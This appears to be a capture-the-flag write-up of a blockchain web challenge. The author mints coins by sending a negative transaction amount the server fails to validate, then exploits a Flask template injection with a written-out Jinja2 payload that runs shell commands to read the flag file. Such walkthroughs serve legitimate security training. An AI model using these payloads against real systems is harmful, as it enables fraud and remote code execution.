Chainsmoker
7 minutes to read
We are given a Python script called cli.py that is intended to interact with the remote instance. Moreover, we have some Python source code that are related to Blockchain and might be running in the server.
Another file we have is bot_wallet.txt, which contains a Blockchain wallet:
LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Finally, there’s a README.txt file that says:
The flag is located at /app/flag.txt
reconnaissance
The remote server is probably running a Flask application (notice that the response status message is in capital letters, and also the Server header):
$ curl -i 178.128.173.79:31884
HTTP/1.1 404 NOT FOUND
Server: Werkzeug/2.1.2 Python/3.8.10
Date:
Content-Type: text/html; charset=utf-8
Content-Length: 207
Connection: close
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Maybe we must compromise the server to get the flag, because there is no reference to the flag in the given source files. So, keep in mind that the objective is to compromise the Flask application.
CLI setup
The CLI (cli.py) starts with a local server URL, which should be the remote instance for us:
wallet = None
SERVICE_URL = "http://127.0.0.1:5000"
So let’s thange it to "http://178.128.173.79:31884".
The CLI offers the following options:
options = {
"help": help,
"wallet show": wallet_show,
"wallet generate": wallet_generate,
"wallet load": wallet_load,
"wallet save": wallet_save,
"transaction": transaction,
"mine": mine,
"pending transactions": pending_transactions,
"balance": balance,
"nodes": nodes,
"blocks": blocks,
"transactions": transactions
}
if __name__ == "__main__":
help()
while True:
i = input("Blockchain> ")
if i in options:
options[i]()
CLI analysis
The only option where we can provide user input is transaction:
def transaction():
global wallet
if wallet is None:
print("[!] Please generate/load a wallet first!")
return -1
recipient = input("Enter Recipient> ")
while True:
amount = input("Amount> ")
if amount.isdigit():
if int(amount) > get_wallet_balance():
print("[+] Cannot send more coin than you have!")
else:
break
else:
print("[+] NaN")
data = input("Enter Data> ")
tx = Transaction(wallet.address, recipient, int(amount))
tx.data = data
tx.sig = hex(wallet.sign_message(str(tx)))[2:]
#required = ['sender', 'recipient', 'amount', 'signature']
r = requests.post(f"{SERVICE_URL}/transactions/new", json={"sender": wallet.address, "recipient":
recipient, "amount": int(amount), "signature": tx.sig, "data": data})
print(f"[+] Sent Transaction: {r.json()['message']}")
Basically, it performs a POST request to /transactions/new indicating the sender and receiver wallet addresses (when using the CLI, we can enter a blank address to indicate our own wallet), the amount of coins to send and some data.
Fuzzing the server
The CLI checks that we have enough coins and that our input data is a number, but we can comment those lines of code and enter junk data… Maybe the server does not check it appropiately. This is the new code (new_cli.py):
def transaction():
global wallet
if wallet is None:
print("[!] Please generate/load a wallet first!")
return -1
recipient = input("Enter Recipient> ")
# while True:
amount = input("Amount> ")
# if amount.isdigit():
# if int(amount) > get_wallet_balance():
# print("[+] Cannot send more coin than you have!")
# else:
# break
# else:
# print("[+] NaN")
data = input("Enter Data> ")
tx = Transaction(wallet.address, recipient, int(amount))
tx.data = data
tx.sig = hex(wallet.sign_message(str(tx)))[2:]
#required = ['sender', 'recipient', 'amount', 'signature']
r = requests.post(f"{SERVICE_URL}/transactions/new", json={"sender": wallet.address, "recipient":
recipient, "amount": int(amount), "signature": tx.sig, "data": data})
print(f"[+] Sent Transaction: {r.json()['message']}")
Before doing this, we need to obtain a wallet (wallet_generate and wallet_show). Then, we do the transaction. For example, we can try negative numbers:
$ python3 new_cli.py
Options:
help | wallet show | wallet generate | wallet load | wallet save | transaction | mine | pending transactions | balance | nodes | blocks | transactions
Blockchain> wallet generate
[+] WARNING: KEYS NOT SAVED TO DISK
Blockchain> wallet show
[+] Address: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDeUs1OWF1SzVjZVpWUmc2MzZQbEU5REcrMQpmSE96SmI5TjhHWlFBNnQ2TzJrMUEzaU02ZXhwcmpVSElKWnFZaTQ0T1VUQm5xMXFtQlBPQmdtU0lHWEwyRTdXCnFPOTJDV1JFOThsNTRpQUhNM2NKaUVkemxucWRwdnZVUHhyd2FvRXhyQ3BlU3g1c2VNa0dpc1JwMVBvdWk3REEKcjd6Y0NZdERIWnUyK2ZpZFRRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
[+] Balance: 0
Blockchain> wallet save
Enter Wallet File Name> wallet.txt
Blockchain> transaction
Enter Recipient>
Amount> -1337
Enter Data> Testing
[+] Sent Transaction: Transaction will be added to Block 3
We need to mine the block with mine in order to make the transaction effective. We will find out that we have 1338 as balance, so the server is vulnerable:
Blockchain> mine
[+] Mining!
[+] Done! - New Block Forged (3)
Blockchain> wallet show
[+] Address: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDeUs1OWF1SzVjZVpWUmc2MzZQbEU5REcrMQpmSE96SmI5TjhHWlFBNnQ2TzJrMUEzaU02ZXhwcmpVSElKWnFZaTQ0T1VUQm5xMXFtQlBPQmdtU0lHWEwyRTdXCnFPOTJDV1JFOThsNTRpQUhNM2NKaUVkemxucWRwdnZVUHhyd2FvRXhyQ3BlU3g1c2VNa0dpc1JwMVBvdWk3REEKcjd6Y0NZdERIWnUyK2ZpZFRRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
[+] Balance: 1338
What has happened? We told the server to send -1337 coins from us to us, so our balance is “reduced” as 0 - (-1337) = 1337. When mining a block, we receive an additional coin, so we end up with 1338 coins.
Interacting with the bot
Now that we have money, we can try to send the bot a coin. And let’s capture the requests and responses from /mine with Burp Suite:
def mine():
global wallet
if wallet is None:
print("[!] Please generate/load a wallet first!")
return -1
print("[+] Mining!")
r_last_block = requests.get(f"{SERVICE_URL}/last_block").json()
last_block = Block.from_json(r_last_block)
last_proof = last_block.proof
last_hash = last_block.hash()
proof = 0
while valid_proof(last_proof, proof, last_hash) is False:
proof += 1
tx = Transaction("0", wallet.address, 1)
sig = hex(wallet.sign_message(str(tx)))[2:]
#required = ['recipient', "signature", "proof"]
r = requests.post(
f"{SERVICE_URL}/mine",
json={
"recipient": wallet.address,
"signature": sig,
"proof": proof
}, proxies={
'http': '127.0.0.1:8080'
})
j = r.json()
if r.status_code == 200:
print(f"[+] Done! - {j['message']} ({j['index']})")
else:
print(f"[!] Done - {j['message']}")
We can load the wallet from a file and keep the same balance. Let’s do the transaction and mine it:
$ python3 new_cli.py
Options:
help | wallet show | wallet generate | wallet load | wallet save | transaction | mine | pending transactions | balance | nodes | blocks | transactions
Blockchain> wallet load
Enter Wallet File Name (q to quit)> wallet.txt
Blockchain> wallet show
[+] Address: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
[+] Balance: 1338
Blockchain> transaction
Enter Recipient> LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount> 1
Enter Data> One coin
[+] Sent Transaction: Transaction will be added to Block 4
Blockchain> mine
[+] Mining!
Now we get the request in Burp Suite:
And this is the response:
If we forward the request, we still have the same balance:
[+] Done! - New Block Forged (4)
Blockchain> wallet show
[+] Address: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
[+] Balance: 1338
If the bot replies with another transaction, we should mine the new block:
Blockchain> mine
[+] Mining!
And we get another HTTP response in Burp Suite:
Now we have two more coins. We can also view the received data using transactions and specifying the block index:
[+] Done! - New Block Forged (5)
Blockchain> wallet show
[+] Address: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
[+] Balance: 1340
Blockchain> transactions
Enter Block Index> 5
------------------------------
From: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
To: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount: 1
Data: Minimum Amount not met! (>= 1,000,000)
------------------------------
From: 0
To: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount: 1
Data:
------------------------------
We guess that we need to send one million coins to achieve something.
Becoming millionaire
So, let’s do another transaction with a negative value so that we have enough coins:
Blockchain> transaction
Enter Recipient>
Amount> -100000000
Enter Data> Millionaire
[+] Sent Transaction: Transaction will be added to Block 6
Blockchain> mine
[+] Mining!
[+] Done! - New Block Forged (6)
Blockchain> wallet show
[+] Address: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
[+] Balance: 100001341
Alright, now we need to make a transaction of one million coins to pass the limit:
Blockchain> transaction
Enter Recipient> LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount> 1000001
Enter Data> Hi bot
[+] Sent Transaction: Transaction will be added to Block 7
Blockchain> mine
[+] Mining!
[+] Done! - New Block Forged (7)
Blockchain> mine
[+] Mining!
[+] Done! - New Block Forged (8)
After mining our transaction and the bot’s transaction, we can see in Burp Suite that our input data is reflected in the response:
We can visualize it from the CLI too:
Blockchain> transactions
Enter Block Index> 8
------------------------------
From: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
To: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount: 1000001
Data: Hello From LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3...!
You said: Hi bot
------------------------------
From: 0
To: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount: 1
Data:
------------------------------
SSTI exploitation
This fact encourages to test some payloads for Server-Side Template Injection (SSTI), because usually SSTI appears in challenges related to Flask. For instance, we can send {{7*7}} and check if we see 49:
Blockchain> transaction
Enter Recipient> LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount> 1000001
Enter Data> {{7*7}}
[+] Sent Transaction: Transaction will be added to Block 9
Blockchain> mine
[+] Mining!
[+] Done! - New Block Forged (9)
Blockchain> mine
[+] Mining!
[+] Done! - New Block Forged (10)
And there we have it:
Blockchain> transactions
Enter Block Index> 10
------------------------------
From: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
To: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount: 1000001
Data: Hello From LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3...!
You said: 49
------------------------------
From: 0
To: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount: 1
Data:
------------------------------
At this point, we can inject Python code in order to get Remote Code Execution (RCE). In PayloadsAllTheThings we can find the following payload to execute a system command:
{{ cycler.__init__.__globals__.os.popen('id').read() }}
Flag
So let’s enter cat /app/flag.txt in order to get the flag:
Blockchain> transaction
Enter Recipient> LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount> 1000001
Enter Data> {{ cycler.__init__.__globals__.os.popen('cat /app/flag.txt').read() }}
[+] Sent Transaction: Transaction will be added to Block 11
Blockchain> mine
[+] Mining!
[+] Done! - New Block Forged (11)
Blockchain> mine
[+] Mining!
[+] Done! - New Block Forged (12)
Blockchain> transactions
Enter Block Index> 12
------------------------------
From: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
To: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount: 1000001
Data: Hello From LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3...!
You said: HTB{w34k_Rs4_4nD_T3mPl4t3s___Wh4t_h4s_tH3_w0R1d_c0m3_t0?!?}
------------------------------
From: 0
To: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount: 1
Data:
------------------------------